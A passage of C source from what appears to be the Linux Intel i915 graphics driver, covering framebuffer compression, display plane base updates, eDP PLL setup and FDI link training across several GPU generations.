/* If the kernel debugger is active, always disable compression */
if (in_dbg_master())
goto out_disable;
/* If the scanout has not changed, don't modify the FBC settings.
* Note that we make the fundamental assumption that the fb->obj
* cannot be unpinned (and have its GTT offset and fence revoked)
* without first being decoupled from the scanout and FBC disabled.
*/
if (dev_priv->cfb_plane == intel_crtc->plane &&
dev_priv->cfb_fb == fb->base.id &&
dev_priv->cfb_y == crtc->y)
return;
if (intel_fbc_enabled(dev)) {
/* We update FBC along two paths, after changing fb/crtc
* configuration (modeswitching) and after page-flipping
* finishes. For the latter, we know that not only did
* we disable the FBC at the start of the page-flip
* sequence, but also more than one vblank has passed.
*
* For the former case of modeswitching, it is possible
* to switch between two FBC valid configurations
* instantaneously so we do need to disable the FBC
* before we can modify its control registers. We also
* have to wait for the next vblank for that to take
* effect. However, since we delay enabling FBC we can
* assume that a vblank has passed since disabling and
* that we can safely alter the registers in the deferred
* callback.
*
* In the scenario that we go from a valid to invalid
* and then back to valid FBC configuration we have
* no strict enforcement that a vblank occurred since
* disabling the FBC. However, along all current pipe
* disabling paths we do need to wait for a vblank at
* some point. And we wait before enabling FBC anyway.
*/
DRM_DEBUG_KMS("disabling active FBC for update\n");
intel_disable_fbc(dev);
}
intel_enable_fbc(crtc, 500);
return;
out_disable:
/* Multiple disables should be harmless */
if (intel_fbc_enabled(dev)) {
DRM_DEBUG_KMS("unsupported config, disabling FBC\n");
intel_disable_fbc(dev);
}
}
int
intel_pin_and_fence_fb_obj(struct drm_device *dev,
struct drm_i915_gem_object *obj,
struct intel_ring_buffer *pipelined)
{
struct drm_i915_private *dev_priv = dev->dev_private;
u32 alignment;
int ret;
switch (obj->tiling_mode) {
case I915_TILING_NONE:
if (IS_BROADWATER(dev) || IS_CRESTLINE(dev))
alignment = 128 * 1024;
else if (INTEL_INFO(dev)->gen >= 4)
alignment = 4 * 1024;
else
alignment = 64 * 1024;
break;
case I915_TILING_X:
/* pin() will align the object as required by fence */
alignment = 0;
break;
case I915_TILING_Y:
/* FIXME: Is this true? */
DRM_ERROR("Y tiled not allowed for scan out buffers\n");
return -EINVAL;
default:
BUG();
}
dev_priv->mm.interruptible = false;
ret = i915_gem_object_pin_to_display_plane(obj, alignment, pipelined);
if (ret)
goto err_interruptible;
/* Install a fence for tiled scan-out. Pre-i965 always needs a
* fence, whereas 965+ only requires a fence if using
* framebuffer compression. For simplicity, we always install
* a fence as the cost is not that onerous.
*/
if (obj->tiling_mode != I915_TILING_NONE) {
ret = i915_gem_object_get_fence(obj, pipelined);
if (ret)
goto err_unpin;
}
dev_priv->mm.interruptible = true;
return 0;
err_unpin:
i915_gem_object_unpin(obj);
err_interruptible:
dev_priv->mm.interruptible = true;
return ret;
}
static int i9xx_update_plane(struct drm_crtc *crtc, struct drm_framebuffer *fb,
int x, int y)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
struct intel_framebuffer *intel_fb;
struct drm_i915_gem_object *obj;
int plane = intel_crtc->plane;
unsigned long Start, Offset;
u32 dspcntr;
u32 reg;
switch (plane) {
case 0:
case 1:
break;
default:
DRM_ERROR("Can't update plane %d in SAREA\n", plane);
return -EINVAL;
}
intel_fb = to_intel_framebuffer(fb);
obj = intel_fb->obj;
reg = DSPCNTR(plane);
dspcntr = I915_READ(reg);
/* Mask out pixel format bits in case we change it */
dspcntr &= ~DISPPLANE_PIXFORMAT_MASK;
switch (fb->bits_per_pixel) {
case 8:
dspcntr |= DISPPLANE_8BPP;
break;
case 16:
if (fb->depth == 15)
dspcntr |= DISPPLANE_15_16BPP;
else
dspcntr |= DISPPLANE_16BPP;
break;
case 24:
case 32:
dspcntr |= DISPPLANE_32BPP_NO_ALPHA;
break;
default:
DRM_ERROR("Unknown color depth %d\n", fb->bits_per_pixel);
return -EINVAL;
}
if (INTEL_INFO(dev)->gen >= 4) {
if (obj->tiling_mode != I915_TILING_NONE)
dspcntr |= DISPPLANE_TILED;
else
dspcntr &= ~DISPPLANE_TILED;
}
I915_WRITE(reg, dspcntr);
Start = obj->gtt_offset;
Offset = y * fb->pitch + x * (fb->bits_per_pixel / 8);
DRM_DEBUG_KMS("Writing base %08lX %08lX %d %d %d\n",
Start, Offset, x, y, fb->pitch);
I915_WRITE(DSPSTRIDE(plane), fb->pitch);
if (INTEL_INFO(dev)->gen >= 4) {
I915_WRITE(DSPSURF(plane), Start);
I915_WRITE(DSPTILEOFF(plane), (y << 16) | x);
I915_WRITE(DSPADDR(plane), Offset);
} else
I915_WRITE(DSPADDR(plane), Start + Offset);
POSTING_READ(reg);
return 0;
}
static int ironlake_update_plane(struct drm_crtc *crtc,
struct drm_framebuffer *fb, int x, int y)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
struct intel_framebuffer *intel_fb;
struct drm_i915_gem_object *obj;
int plane = intel_crtc->plane;
unsigned long Start, Offset;
u32 dspcntr;
u32 reg;
switch (plane) {
case 0:
case 1:
break;
default:
DRM_ERROR("Can't update plane %d in SAREA\n", plane);
return -EINVAL;
}
intel_fb = to_intel_framebuffer(fb);
obj = intel_fb->obj;
reg = DSPCNTR(plane);
dspcntr = I915_READ(reg);
/* Mask out pixel format bits in case we change it */
dspcntr &= ~DISPPLANE_PIXFORMAT_MASK;
switch (fb->bits_per_pixel) {
case 8:
dspcntr |= DISPPLANE_8BPP;
break;
case 16:
if (fb->depth != 16)
return -EINVAL;
dspcntr |= DISPPLANE_16BPP;
break;
case 24:
case 32:
if (fb->depth == 24)
dspcntr |= DISPPLANE_32BPP_NO_ALPHA;
else if (fb->depth == 30)
dspcntr |= DISPPLANE_32BPP_30BIT_NO_ALPHA;
else
return -EINVAL;
break;
default:
DRM_ERROR("Unknown color depth %d\n", fb->bits_per_pixel);
return -EINVAL;
}
if (obj->tiling_mode != I915_TILING_NONE)
dspcntr |= DISPPLANE_TILED;
else
dspcntr &= ~DISPPLANE_TILED;
/* must disable */
dspcntr |= DISPPLANE_TRICKLE_FEED_DISABLE;
I915_WRITE(reg, dspcntr);
Start = obj->gtt_offset;
Offset = y * fb->pitch + x * (fb->bits_per_pixel / 8);
DRM_DEBUG_KMS("Writing base %08lX %08lX %d %d %d\n",
Start, Offset, x, y, fb->pitch);
I915_WRITE(DSPSTRIDE(plane), fb->pitch);
I915_WRITE(DSPSURF(plane), Start);
I915_WRITE(DSPTILEOFF(plane), (y << 16) | x);
I915_WRITE(DSPADDR(plane), Offset);
POSTING_READ(reg);
return 0;
}
/* Assume fb object is pinned & idle & fenced and just update base pointers */
static int
intel_pipe_set_base_atomic(struct drm_crtc *crtc, struct drm_framebuffer *fb,
int x, int y, enum mode_set_atomic state)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
int ret;
ret = dev_priv->display.update_plane(crtc, fb, x, y);
if (ret)
return ret;
intel_update_fbc(dev);
intel_increase_pllclock(crtc);
return 0;
}
static int
intel_pipe_set_base(struct drm_crtc *crtc, int x, int y,
struct drm_framebuffer *old_fb)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_master_private *master_priv;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int ret;
/* no fb bound */
if (!crtc->fb) {
DRM_ERROR("No FB bound\n");
return 0;
}
switch (intel_crtc->plane) {
case 0:
case 1:
break;
default:
DRM_ERROR("no plane for crtc\n");
return -EINVAL;
}
mutex_lock(&dev->struct_mutex);
ret = intel_pin_and_fence_fb_obj(dev,
to_intel_framebuffer(crtc->fb)->obj,
NULL);
if (ret != 0) {
mutex_unlock(&dev->struct_mutex);
DRM_ERROR("pin & fence failed\n");
return ret;
}
if (old_fb) {
struct drm_i915_private *dev_priv = dev->dev_private;
struct drm_i915_gem_object *obj = to_intel_framebuffer(old_fb)->obj;
wait_event(dev_priv->pending_flip_queue,
atomic_read(&dev_priv->mm.wedged) ||
atomic_read(&obj->pending_flip) == 0);
/* Big Hammer, we also need to ensure that any pending
* MI_WAIT_FOR_EVENT inside a user batch buffer on the
* current scanout is retired before unpinning the old
* framebuffer.
*
* This should only fail upon a hung GPU, in which case we
* can safely continue.
*/
ret = i915_gem_object_finish_gpu(obj);
(void) ret;
}
ret = intel_pipe_set_base_atomic(crtc, crtc->fb, x, y,
LEAVE_ATOMIC_MODE_SET);
if (ret) {
i915_gem_object_unpin(to_intel_framebuffer(crtc->fb)->obj);
mutex_unlock(&dev->struct_mutex);
DRM_ERROR("failed to update base address\n");
return ret;
}
if (old_fb) {
intel_wait_for_vblank(dev, intel_crtc->pipe);
i915_gem_object_unpin(to_intel_framebuffer(old_fb)->obj);
}
mutex_unlock(&dev->struct_mutex);
if (!dev->primary->master)
return 0;
master_priv = dev->primary->master->driver_priv;
if (!master_priv->sarea_priv)
return 0;
if (intel_crtc->pipe) {
master_priv->sarea_priv->pipeB_x = x;
master_priv->sarea_priv->pipeB_y = y;
} else {
master_priv->sarea_priv->pipeA_x = x;
master_priv->sarea_priv->pipeA_y = y;
}
return 0;
}
static void ironlake_set_pll_edp(struct drm_crtc *crtc, int clock)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
u32 dpa_ctl;
DRM_DEBUG_KMS("eDP PLL enable for clock %d\n", clock);
dpa_ctl = I915_READ(DP_A);
dpa_ctl &= ~DP_PLL_FREQ_MASK;
if (clock < 200000) {
u32 temp;
dpa_ctl |= DP_PLL_FREQ_160MHZ;
/* workaround for 160Mhz:
1) program 0x4600c bits 15:0 = 0x8124
2) program 0x46010 bit 0 = 1
3) program 0x46034 bit 24 = 1
4) program 0x64000 bit 14 = 1
*/
temp = I915_READ(0x4600c);
temp &= 0xffff0000;
I915_WRITE(0x4600c, temp | 0x8124);
temp = I915_READ(0x46010);
I915_WRITE(0x46010, temp | 1);
temp = I915_READ(0x46034);
I915_WRITE(0x46034, temp | (1 << 24));
} else {
dpa_ctl |= DP_PLL_FREQ_270MHZ;
}
I915_WRITE(DP_A, dpa_ctl);
POSTING_READ(DP_A);
udelay(500);
}
static void intel_fdi_normal_train(struct drm_crtc *crtc)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int pipe = intel_crtc->pipe;
u32 reg, temp;
/* enable normal train */
reg = FDI_TX_CTL(pipe);
temp = I915_READ(reg);
if (IS_IVYBRIDGE(dev)) {
temp &= ~FDI_LINK_TRAIN_NONE_IVB;
temp |= FDI_LINK_TRAIN_NONE_IVB | FDI_TX_ENHANCE_FRAME_ENABLE;
} else {
temp &= ~FDI_LINK_TRAIN_NONE;
temp |= FDI_LINK_TRAIN_NONE | FDI_TX_ENHANCE_FRAME_ENABLE;
}
I915_WRITE(reg, temp);
reg = FDI_RX_CTL(pipe);
temp = I915_READ(reg);
if (HAS_PCH_CPT(dev)) {
temp &= ~FDI_LINK_TRAIN_PATTERN_MASK_CPT;
temp |= FDI_LINK_TRAIN_NORMAL_CPT;
} else {
temp &= ~FDI_LINK_TRAIN_NONE;
temp |= FDI_LINK_TRAIN_NONE;
}
I915_WRITE(reg, temp | FDI_RX_ENHANCE_FRAME_ENABLE);
/* wait one idle pattern time */
POSTING_READ(reg);
udelay(1000);
/* IVB wants error correction enabled */
if (IS_IVYBRIDGE(dev))
I915_WRITE(reg, I915_READ(reg) | FDI_FS_ERRC_ENABLE |
FDI_FE_ERRC_ENABLE);
}
static void cpt_phase_pointer_enable(struct drm_device *dev, int pipe)
{
struct drm_i915_private *dev_priv = dev->dev_private;
u32 flags = I915_READ(SOUTH_CHICKEN1);
flags |= FDI_PHASE_SYNC_OVR(pipe);
I915_WRITE(SOUTH_CHICKEN1, flags); /* once to unlock... */
flags |= FDI_PHASE_SYNC_EN(pipe);
I915_WRITE(SOUTH_CHICKEN1, flags); /* then again to enable */
POSTING_READ(SOUTH_CHICKEN1);
}
/* The FDI link training functions for ILK/Ibexpeak. */
static void ironlake_fdi_link_train(struct drm_crtc *crtc)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int pipe = intel_crtc->pipe;
int plane = intel_crtc->plane;
u32 reg, temp, tries;
/* FDI needs bits from pipe & plane first */
assert_pipe_enabled(dev_priv, pipe);
assert_plane_enabled(dev_priv, plane);
/* Train 1: umask FDI RX Interrupt symbol_lock and bit_lock bit
for train result */
reg = FDI_RX_IMR(pipe);
temp = I915_READ(reg);
temp &= ~FDI_RX_SYMBOL_LOCK;
temp &= ~FDI_RX_BIT_LOCK;
I915_WRITE(reg, temp);
I915_READ(reg);
udelay(150);
/* enable CPU FDI TX and PCH FDI RX */
reg = FDI_TX_CTL(pipe);
temp = I915_READ(reg);
temp &= ~(7 << 19);
temp |= (intel_crtc->fdi_lanes - 1) << 19;
temp &= ~FDI_LINK_TRAIN_NONE;
temp |= FDI_LINK_TRAIN_PATTERN_1;
I915_WRITE(reg, temp | FDI_TX_ENABLE);
reg = FDI_RX_CTL(pipe);
temp = I915_READ(reg);
temp &= ~FDI_LINK_TRAIN_NONE;
temp |= FDI_LINK_TRAIN_PATTERN_1;
I915_WRITE(reg, temp | FDI_RX_ENABLE);
POSTING_READ(reg);
udelay(150);
/* Ironlake workaround, enable clock pointer after FDI enable*/
if (HAS_PCH_IBX(dev)) {
I915_WRITE(FDI_RX_CHICKEN(pipe), FDI_RX_PHASE_SYNC_POINTER_OVR);
I915_WRITE(FDI_RX_CHICKEN(pipe), FDI_RX_PHASE_SYNC_POINTER_OVR |
FDI_RX_PHASE_SYNC_POINTER_EN);
}
reg = FDI_RX_IIR(pipe);
for (tries = 0; tries < 5; tries++) {
temp = I915_READ(reg);
DRM_DEBUG_KMS("FDI_RX_IIR 0x%x\n", temp);
if ((temp & FDI_RX_BIT_LOCK)) {
DRM_DEBUG_KMS("FDI train 1 done.\n");
I915_WRITE(reg, temp | FDI_RX_BIT_LOCK);
break;
}
}
if (tries == 5)
DRM_ERROR("FDI train 1 fail!\n");
/* Train 2 */
reg = FDI_TX_CTL(pipe);
temp = I915_READ(reg);
temp &= ~FDI_LINK_TRAIN_NONE;
temp |= FDI_LINK_TRAIN_PATTERN_2;
I915_WRITE(reg, temp);
reg = FDI_RX_CTL(pipe);
temp = I915_READ(reg);
temp &= ~FDI_LINK_TRAIN_NONE;
temp |= FDI_LINK_TRAIN_PATTERN_2;
I915_WRITE(reg, temp);
POSTING_READ(reg);
udelay(150);
reg = FDI_RX_IIR(pipe);
for (tries = 0; tries < 5; tries++) {
temp = I915_READ(reg);
DRM_DEBUG_KMS("FDI_RX_IIR 0x%x\n", temp);
if (temp & FDI_RX_SYMBOL_LOCK) {
I915_WRITE(reg, temp | FDI_RX_SYMBOL_LOCK);
DRM_DEBUG_KMS("FDI train 2 done.\n");
break;
}
}
if (tries == 5)
DRM_ERROR("FDI train 2 fail!\n");
DRM_DEBUG_KMS("FDI train done\n");
}
static const int snb_b_fdi_train_param [] = {
FDI_LINK_TRAIN_400MV_0DB_SNB_B,
FDI_LINK_TRAIN_400MV_6DB_SNB_B,
FDI_LINK_TRAIN_600MV_3_5DB_SNB_B,
FDI_LINK_TRAIN_800MV_0DB_SNB_B,
};
/* The FDI link training functions for SNB/Cougarpoint. */
static void gen6_fdi_link_train(struct drm_crtc *crtc)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int pipe = intel_crtc->pipe;
u32 reg, temp, i;
/* Train 1: umask FDI RX Interrupt symbol_lock and bit_lock bit
for train result */
reg = FDI_RX_IMR(pipe);
temp = I915_READ(reg);
temp &= ~FDI_RX_SYMBOL_LOCK;
temp &= ~FDI_RX_BIT_LOCK;
I915_WRITE(reg, temp);
POSTING_READ(reg);
udelay(150);
/* enable CPU FDI TX and PCH FDI RX */
reg = FDI_TX_CTL(pipe);
temp = I915_READ(reg);
temp &= ~(7 << 19);
temp |= (intel_crtc->fdi_lanes - 1) << 19;
temp &= ~FDI_LINK_TRAIN_NONE;
temp |= FDI_LINK_TRAIN_PATTERN_1;
temp &= ~FDI_LINK_TRAIN_VOL_EMP_MASK;
/* SNB-B */
temp |= FDI_LINK_TRAIN_400MV_0DB_SNB_B;
I915_WRITE(reg, temp | FDI_TX_ENABLE);
reg = FDI_RX_CTL(pipe);
temp = I915_READ(reg);
if (HAS_PCH_CPT(dev)) {
temp &= ~FDI_LINK_TRAIN_PATTERN_MASK_CPT;
temp |= FDI_LINK_TRAIN_PATTERN_1_CPT;
} else {
temp &= ~FDI_LINK_TRAIN_NONE;
temp |= FDI_LINK_TRAIN_PATTERN_1;
}
I915_WRITE(reg, temp | FDI_RX_ENABLE);
POSTING_READ(reg);
udelay(150);
if (HAS_PCH_CPT(dev))
cpt_phase_pointer_enable(dev, pipe);
for (i = 0; i < 4; i++ ) {
reg = FDI_TX_CTL(pipe);
temp = I915_READ(reg);
temp &= ~FDI_LINK_TRAIN_VOL_EMP_MASK;
temp |= snb_b_fdi_train_param[i];
I915_WRITE(reg, temp);
POSTING_READ(reg);
udelay(500);
reg = FDI_RX_IIR(pipe);
temp = I915_READ(reg);
DRM_DEBUG_KMS("FDI_RX_IIR 0x%x\n", temp);
if (temp & FDI_RX_BIT_LOCK) {
I915_WRITE(reg, temp | FDI_RX_BIT_LOCK);
DRM_DEBUG_KMS("FDI train 1 done.\n");
break;
}
}
if (i == 4)
DRM_ERROR("FDI train 1 fail!\n");
/* Train 2 */
reg = FDI_TX_CTL(pipe);
temp = I915_READ(reg);
temp &= ~FDI_LINK_TRAIN_NONE;
temp |= FDI_LINK_TRAIN_PATTERN_2;
if (IS_GEN6(dev)) {
temp &= ~FDI_LINK_TRAIN_VOL_EMP_MASK;
/* SNB-B */
temp |= FDI_LINK_TRAIN_400MV_0DB_SNB_B;
}
I915_WRITE(reg, temp);
reg = FDI_RX_CTL(pipe);
temp = I915_READ(reg);
if (HAS_PCH_CPT(dev)) {
temp &= ~FDI_LINK_TRAIN_PATTERN_MASK_CPT;
temp |= FDI_LINK_TRAIN_PATTERN_2_CPT;
} else {
temp &= ~FDI_LINK_TRAIN_NONE;
temp |= FDI_LINK_TRAIN_PATTERN_2;
}
I915_WRITE(reg, temp);
POSTING_READ(reg);
udelay(150);
for (i = 0; i < 4; i++ ) {
reg = FDI_TX_CTL(pipe);
temp = I915_READ(reg);
temp &= ~FDI_LINK_TRAIN_VOL_EMP_MASK;
temp |= snb_b_fdi_train_param[i];
I915_WRITE(reg, temp);
POSTING_READ(reg);
udelay(500);
reg = FDI_RX_IIR(pipe);
temp = I915_READ(reg);
DRM_DEBUG_KMS("FDI_RX_IIR 0x%x\n", temp);
if (temp & FDI_RX_SYMBOL_LOCK) {
I915_WRITE(reg, temp | FDI_RX_SYMBOL_LOCK);
DRM_DEBUG_KMS("FDI train 2 done.\n");
break;
}
}
if (i == 4)
DRM_ERROR("FDI train 2 fail!\n");
DRM_DEBUG_KMS("FDI train done.\n");
}
/* Manual link training for Ivy Bridge A0 parts */
static void ivb_manual_fdi_link_train(struct drm_crtc *crtc)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int pipe = intel_crtc->pipe;
u32 reg, temp, i;
/* Train 1: umask FDI RX Interrupt symbol_lock and bit_lock bit
for train result */
reg = FDI_RX_IMR(pipe);
temp = I915_READ(reg);
temp &= ~FDI_RX_SYMBOL_LOCK;
temp &= ~FDI_RX_BIT_LOCK;
I915_WRITE(reg, temp);
POSTING_READ(reg);
udelay(150);
/* enable CPU FDI TX and PCH FDI RX */
reg = FDI_TX_CTL(pipe);
temp = I915_READ(reg);
temp &= ~(7 << 19);
temp |= (intel_crtc->fdi_lanes - 1) << 19;
temp &= ~(FDI_LINK_TRAIN_AUTO | FDI_LINK_TRAIN_NONE_IVB);
temp |= FDI_LINK_TRAIN_PATTERN_1_IVB;
temp &= ~FDI_LINK_TRAIN_VOL_EMP_MASK;
temp |= FDI_LINK_TRAIN_400MV_0DB_SNB_B;
temp |= FDI_COMPOSITE_SYNC;
I915_WRITE(reg, temp | FDI_TX_ENABLE);
reg = FDI_RX_CTL(pipe);
temp = I915_READ(reg);
temp &= ~FDI_LINK_TRAIN_AUTO;
temp &= ~FDI_LINK_TRAIN_PATTERN_MASK_CPT;
temp |= FDI_LINK_TRAIN_PATTERN_1_CPT;
temp |= FDI_COMPOSITE_SYNC;
I915_WRITE(reg, temp | FDI_RX_ENABLE);
POSTING_READ(reg);
udelay(150);
if (HAS_PCH_CPT(dev))
cpt_phase_pointer_enable(dev, pipe);
for (i = 0; i < 4; i++ ) {
reg = FDI_TX_CTL(pipe);
temp = I915_READ(reg);
temp &= ~FDI_LINK_TRAIN_VOL_EMP_MASK;
temp |= snb_b_fdi_train_param[i];
I915_WRITE(reg, temp);
POSTING_READ(reg);
udelay(500);
reg = FDI_RX_IIR(pipe);
temp = I915_READ(reg);
DRM_DEBUG_KMS("FDI_RX_IIR 0x%x\n", temp);
if (temp & FDI_RX_BIT_LOCK ||
(I915_READ(reg) & FDI_RX_BIT_LOCK)) {
I915_WRITE(reg, temp | FDI_RX_BIT_LOCK);
DRM_DEBUG_KMS("FDI train 1 done.\n");
break;
}
}
if (i == 4)
DRM_ERROR("FDI train 1 fail!\n");
/* Train 2 */
reg = FDI_TX_CTL(pipe);
temp = I915_READ(reg);
temp &= ~FDI_LINK_TRAIN_NONE_IVB;
temp |= FDI_LINK_TRAIN_PATTERN_2_IVB;
temp &= ~FDI_LINK_TRAIN_VOL_EMP_MASK;
temp |= FDI_LINK_TRAIN_400MV_0DB_SNB_B;
I915_WRITE(reg, temp);
reg = FDI_RX_CTL(pipe);
temp = I915_READ(reg);
temp &= ~FDI_LINK_TRAIN_PATTERN_MASK_CPT;
temp |= FDI_LINK_TRAIN_PATTERN_2_CPT;
I915_WRITE(reg, temp);
POSTING_READ(reg);
udelay(150);
for (i = 0; i < 4; i++ ) {
reg = FDI_TX_CTL(pipe);
temp = I915_READ(reg);
temp &= ~FDI_LINK_TRAIN_VOL_EMP_MASK;
temp |= snb_b_fdi_train_param[i];
I915_WRITE(reg, temp);
POSTING_READ(reg);
udelay(500);
reg = FDI_RX_IIR(pipe);
temp = I915_READ(reg);
DRM_DEBUG_KMS("FDI_RX_IIR 0x%x\n", temp);
if (temp & FDI_RX_SYMBOL_LOCK) {
I915_WRITE(reg, temp | FDI_RX_SYMBOL_LOCK);
DRM_DEBUG_KMS("FDI train 2 done.\n");
break;
}
}
if (i == 4)
DRM_ERROR("FDI train 2 fail!\n");
DRM_DEBUG_KMS("FDI train done.\n");
}
static void ironlake_fdi_pll_enable(struct drm_crtc *crtc)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int pipe = intel_crtc->pipe;
u32 reg, temp;
/* Write the TU size bits so error detection works */
I915_WRITE(FDI_RX_TUSIZE1(pipe),
I915_READ(PIPE_DATA_M1(pipe)) & TU_SIZE_MASK);
/* enable PCH FDI RX PLL, wait warmup plus DMI latency */
reg = FDI_RX_CTL(pipe);
temp = I915_READ(reg);
temp &= ~((0x7 << 19) | (0x7 << 16));
temp |= (intel_crtc->fdi_lanes - 1) << 19;
temp |= (I915_READ(PIPECONF(pipe)) & PIPE_BPC_MASK) << 11;
I915_WRITE(reg, temp | FDI_RX_PLL_ENABLE);
POSTING_READ(reg);
udelay(200);
/* Switch from Rawclk to PCDclk */
temp = I915_READ(reg);
I915_WRITE(reg, temp | FDI_PCDCLK);
POSTING_READ(reg);
udelay(200);
/* Enable CPU FDI TX PLL, always on for Ironlake */
reg = FDI_TX_CTL(pipe);
temp = I915_READ(reg);
if ((temp & FDI_TX_PLL_ENABLE) == 0) {
I915_WRITE(reg, temp | FDI_TX_PLL_ENABLE);
POSTING_READ(reg);
udelay(100);
}
}
static void cpt_phase_pointer_disable(struct drm_device *dev, int pipe)
{
struct drm_i915_private *dev_priv = dev->dev_private;
u32 flags = I915_READ(SOUTH_CHICKEN1);
flags &= ~(FDI_PHASE_SYNC_EN(pipe));
I915_WRITE(SOUTH_CHICKEN1, flags); /* once to disable... */
flags &= ~(FDI_PHASE_SYNC_OVR(pipe));
I915_WRITE(SOUTH_CHICKEN1, flags); /* then again to lock */
POSTING_READ(SOUTH_CHICKEN1);
}
static void ironlake_fdi_disable(struct drm_crtc *crtc)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int pipe = intel_crtc->pipe;
u32 reg, temp;
/* disable CPU FDI tx and PCH FDI rx */
reg = FDI_TX_CTL(pipe);
temp = I915_READ(reg);
I915_WRITE(reg, temp & ~FDI_TX_ENABLE);
POSTING_READ(reg);
reg = FDI_RX_CTL(pipe);
temp = I915_READ(reg);
temp &= ~(0x7 << 16);
temp |= (I915_READ(PIPECONF(pipe)) & PIPE_BPC_MASK) << 11;
I915_WRITE(reg, temp & ~FDI_RX_ENABLE);
POSTING_READ(reg);
udelay(100);
/* Ironlake workaround, disable clock pointer after downing FDI */
if (HAS_PCH_IBX(dev)) {
I915_WRITE(FDI_RX_CHICKEN(pipe), FDI_RX_PHASE_SYNC_POINTER_OVR);
I915_WRITE(FDI_RX_CHICKEN(pipe),
I915_READ(FDI_RX_CHICKEN(pipe) &
~FDI_RX_PHASE_SYNC_POINTER_EN));
} else if (HAS_PCH_CPT(dev)) {
cpt_phase_pointer_disable(dev, pipe);
}
/* still set train pattern 1 */
reg = FDI_TX_CTL(pipe);
temp = I915_READ(reg);
temp &= ~FDI_LINK_TRAIN_NONE;
temp |= FDI_LINK_TRAIN_PATTERN_1;
I915_WRITE(reg, temp);
reg = FDI_RX_CTL(pipe);
temp = I915_READ(reg);
if (HAS_PCH_CPT(dev)) {
temp &= ~FDI_LINK_TRAIN_PATTERN_MASK_CPT;
temp |= FDI_LINK_TRAIN_PATTERN_1_CPT;
} else {
temp &= ~FDI_LINK_TRAIN_NONE;
temp |= FDI_LINK_TRAIN_PATTERN_1;
}
/* BPC in FDI rx is consistent with that in PIPECONF */
temp &= ~(0x07 << 16);
temp |= (I915_READ(PIPECONF(pipe)) & PIPE_BPC_MASK) << 11;
I915_WRITE(reg, temp);
POSTING_READ(reg);
udelay(100);
}
/*
* When we disable a pipe, we need to clear any pending scanline wait events
* to avoid hanging the ring, which we assume we are waiting on.
*/
static void intel_clear_scanline_wait(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_ring_buffer *ring;
u32 tmp;
if (IS_GEN2(dev))
/* Can't break the hang on i8xx */
return;
ring = LP_RING(dev_priv);
tmp = I915_READ_CTL(ring);
if (tmp & RING_WAIT)
I915_WRITE_CTL(ring, tmp);
}
static void intel_crtc_wait_for_pending_flips(struct drm_crtc *crtc)
{
struct drm_i915_gem_object *obj;
struct drm_i915_private *dev_priv;
if (crtc->fb == NULL)
return;
obj = to_intel_framebuffer(crtc->fb)->obj;
dev_priv = crtc->dev->dev_private;
wait_event(dev_priv->pending_flip_queue,
atomic_read(&obj->pending_flip) == 0);
}
static bool intel_crtc_driving_pch(struct drm_crtc *crtc)
{
struct drm_device *dev = crtc->dev;
struct drm_mode_config *mode_config = &dev->mode_config;
struct intel_encoder *encoder;
/*
* If there's a non-PCH eDP on this crtc, it must be DP_A, and that
* must be driven by its own crtc; no sharing is possible.
*/
list_for_each_entry(encoder, &mode_config->encoder_list, base.head) {
if (encoder->base.crtc != crtc)
continue;
switch (encoder->type) {
case INTEL_OUTPUT_EDP:
if (!intel_encoder_is_pch_edp(&encoder->base))
return false;
continue;
}
}
return true;
}
/*
* Enable PCH resources required for PCH ports:
* - PCH PLLs
* - FDI training & RX/TX
* - update transcoder timings
* - DP transcoding bits
* - transcoder
*/
static void ironlake_pch_enable(struct drm_crtc *crtc)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int pipe = intel_crtc->pipe;
u32 reg, temp;
/* For PCH output, training FDI link */
dev_priv->display.fdi_link_train(crtc);
intel_enable_pch_pll(dev_priv, pipe);
if (HAS_PCH_CPT(dev)) {
/* Be sure PCH DPLL SEL is set */
temp = I915_READ(PCH_DPLL_SEL);
if (pipe == 0 && (temp & TRANSA_DPLL_ENABLE) == 0)
temp |= (TRANSA_DPLL_ENABLE | TRANSA_DPLLA_SEL);
else if (pipe == 1 && (temp & TRANSB_DPLL_ENABLE) == 0)
temp |= (TRANSB_DPLL_ENABLE | TRANSB_DPLLB_SEL);
I915_WRITE(PCH_DPLL_SEL, temp);
}
/* set transcoder timing, panel must allow it */
assert_panel_unlocked(dev_priv, pipe);
I915_WRITE(TRANS_HTOTAL(pipe), I915_READ(HTOTAL(pipe)));
I915_WRITE(TRANS_HBLANK(pipe), I915_READ(HBLANK(pipe)));
I915_WRITE(TRANS_HSYNC(pipe), I915_READ(HSYNC(pipe)));
I915_WRITE(TRANS_VTOTAL(pipe), I915_READ(VTOTAL(pipe)));
I915_WRITE(TRANS_VBLANK(pipe), I915_READ(VBLANK(pipe)));
I915_WRITE(TRANS_VSYNC(pipe), I915_READ(VSYNC(pipe)));
intel_fdi_normal_train(crtc);
/* For PCH DP, enable TRANS_DP_CTL */
if (HAS_PCH_CPT(dev) &&
intel_pipe_has_type(crtc, INTEL_OUTPUT_DISPLAYPORT)) {
